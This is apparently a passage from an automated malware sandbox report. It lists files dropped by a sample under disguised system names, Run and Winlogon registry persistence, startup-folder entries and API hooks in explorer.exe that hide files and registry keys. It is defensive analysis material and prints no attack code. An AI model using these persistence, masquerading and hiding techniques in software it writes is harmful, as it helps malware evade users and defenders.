                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ovdDmGAG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\THthvKov.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\psELHGPB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\GQcIpPoS.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\bbeWvQkg.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\MAhhiIaK.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IJrrbLaQ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\eeEmWDhS.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\CjJRSFHW.logJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\HMPjFLLW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vCoCyIOs.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Recovery\powershell.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Mozilla Firefox\dwm.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NOQISejH.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PbqyFjSG.logJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KVBZghxI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IJrrbLaQ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\psELHGPB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\UuxpgXjt.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\GQcIpPoS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NOQISejH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vCoCyIOs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\THthvKov.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\qGmlrcYy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\EcYAEBsU.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\chceADSX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KVBZghxI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\iaFEdjXM.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\eeEmWDhS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NXnICQCE.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\CjJRSFHW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\RKFGfNRs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\rVVLbyhv.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PbqyFjSG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\HMPjFLLW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ovdDmGAG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\MAhhiIaK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\bbeWvQkg.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scrJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scrJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7691A6EA0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
